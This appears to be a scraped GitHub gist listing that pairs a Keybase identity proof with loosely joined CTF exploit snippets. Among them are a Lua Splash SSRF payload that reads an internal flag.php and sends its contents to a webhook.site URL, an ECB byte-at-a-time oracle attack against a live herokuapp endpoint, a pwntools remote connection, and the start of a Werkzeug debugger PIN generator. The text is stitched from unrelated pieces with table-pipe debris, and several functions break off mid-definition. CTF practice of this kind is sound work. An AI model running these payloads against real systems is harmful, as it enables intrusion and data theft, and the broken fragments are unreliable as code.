I hereby claim:
- I am u0pattern on github.
- I am u0pattern (https://keybase.io/u0pattern) on keybase.
- I have a public key ASAWBhITZG9ljyAr3c3o0UZ332als5XXEZ0xrgC3FgFl2Qo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
#!/usr/bin/python3 | |
from pwn import * | |
# Switch between the remote challenge service and a local copy of the binary.
REMOTE = True

# pwntools tube used by the rest of the script: a TCP connection when REMOTE
# is set, otherwise a locally spawned process of the challenge binary.
p = remote("mc.ax", 31081) if REMOTE else process('./interview-opportunity')
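# pyelftools is a third-party dependency; fail with an install hint when it is
# missing instead of a raw traceback.
try:
    from elftools.elf.elffile import ELFFile
except ImportError:
    # Catch only the missing-module case: a bare ``except`` would also swallow
    # KeyboardInterrupt and any unrelated error raised during the import.
    print("You need to install elftools library: pip3 install pyelftools")
    # Exit non-zero so a caller sees the failure; the ``exit()`` helper is
    # injected by the ``site`` module and is absent under ``python -S``.
    raise SystemExit(1)

# Path of the ELF file to inspect. Must be filled in before running: opening
# an empty path fails.
ELF_FILE = ""  # put the elf file that you want here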
with open(ELF_FILE, 'rb') as f: | |
elffile = ELFFile(f) |
from binascii import unhexlify | |
from Crypto.Cipher import AES | |
import hashlib | |
from itertools import product | |
def key_array_to_key_string(key_list):
    """Return the 16-byte MD5 digest of the bytes listed in *key_list*.

    Each element must be an integer in ``range(256)``; the elements are
    concatenated in order into one byte string, which is then hashed.

    NOTE(review): the surrounding file imports AES, so the digest is
    presumably used as an AES-128 key that mirrors an existing scheme --
    confirm. A single unsalted MD5 pass is not a suitable key-derivation
    function for protecting real data.
    """
    raw_key = bytearray()
    for byte_value in key_list:
        raw_key.append(byte_value)
    digest = hashlib.md5()
    digest.update(raw_key)
    return digest.digest()
def pattern(order): |
import requests | |
from urllib import quote | |
lua=""" | |
function main(splash) | |
local treat = require("treat") | |
local json = splash:http_get('http://172.16.0.14/flag.php') | |
local response=splash:http_get('https://webhook.site/41ccba09-fd57-439b-b8be-05e20e446b72?flag='.. treat.as_string(json.body)) | |
return "hi" | |
end |
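<?php
// Minimal password-form demo: renders the form, then reports whether the
// submitted password matches the value hard-coded below.
//
// NOTE(review): the credential sits in source in plaintext, and nothing here
// limits repeated attempts. A real login would check the input against a
// stored password_hash() value with password_verify().
echo '<html><body><form method="post" action="">Password: <input type="password" name="p"> <input type="submit"></form></body></html>';

// !empty() keeps the original "falsy input prints nothing" behaviour without
// raising an undefined-index notice on a plain GET.
if (!empty($_POST['p'])) {
    // is_string() rejects array input (p[]=...) before the comparison;
    // hash_equals() compares in constant time.
    if (is_string($_POST['p']) && hash_equals('p4ssw0rd', $_POST['p'])) {
        echo '<font color="green">Logged in</font>';
    } else {
        echo '<font color="red">Failed</font>';
    }
}
?>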
import base64,requests,binascii,string | |
flag = 'flag' | |
for i in range(len(flag), 16): | |
salt = 'x' * (16 - 1 - i) | |
known = binascii.hexlify(base64.b64decode(requests.get('https://obscure-river-88658.herokuapp.com/?sugar='+salt).text)) | |
for c in string.printable: | |
unknown = binascii.hexlify(base64.b64decode(requests.get('https://obscure-river-88658.herokuapp.com/?sugar='+(salt+flag+c)).text)) | |
if known[:16] == unknown[:16]: | |
flag += c | |
print(flag) |
<!-- Demo page: a single button that asks the ResponsiveVoice library to speak an Arabic greeting. -->
<html>
<head>
<!-- NOTE(review): third-party script loaded with no integrity attribute, so
     whatever this host serves runs with the page's origin privileges.
     Self-host a reviewed copy, or pin it with Subresource Integrity, where
     that matters. The key= value is visible to every visitor in page source. -->
<script src='https://code.responsivevoice.org/responsivevoice.js?key=WGciAW2s'></script>
</head>
<body>
<!-- Inline onclick handler: a Content-Security-Policy without 'unsafe-inline' would block it. -->
<input onclick="responsiveVoice.speak('أهلا وسهلا','Arabic Male');" type="button" value="Play" />
</body>
</html>
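<?php
# Referer gate: a request that does not arrive from a page on 1337r00t.me (or
# one of its direct sub-domains) is bounced to the same path on
# https://1337r00t.me/.
# 1337r00t\.me >> u can change it to ur own host
#
# NOTE(review): the Referer header is supplied by the client and may be absent
# or forged, so treat this as a navigation convenience, not an access control.
$referer_host = isset($_SERVER['HTTP_REFERER'])
    ? parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST)
    : null;

# Match against the parsed host rather than the raw header: in the earlier
# whole-header pattern, [^\.]+ also accepted "/", so the text in front of the
# site name was not limited to a single host label.
if (!is_string($referer_host) || !preg_match('/^(?:[a-z0-9-]+\.)?1337r00t\.me$/i', $referer_host)) {
    $target = "https://1337r00t.me/" . substr($_SERVER['REQUEST_URI'], 1);
    # The URL is emitted inside a JavaScript string, so encode it for that
    # context. htmlspecialchars() turned "&" into "&amp;" (corrupting query
    # strings, since <script> content is not entity-decoded) and left "\"
    # unescaped.
    $js_target = json_encode($target, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    if ($js_target === false) {
        # The request URI was not valid UTF-8; fall back to the site root.
        $js_target = '"https://1337r00t.me/"';
    }
    exit('<script>window.location.replace(' . $js_target . ');</script>');
}
?>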
import hashlib | |
public_bits = [ | |
'testUser',# username /etc/passwd | |
'flask.app', | |
'Flask', | |
'/usr/local/lib/python3.5/dist-packages/flask/app.py' | |
] | |
private_bits = [ |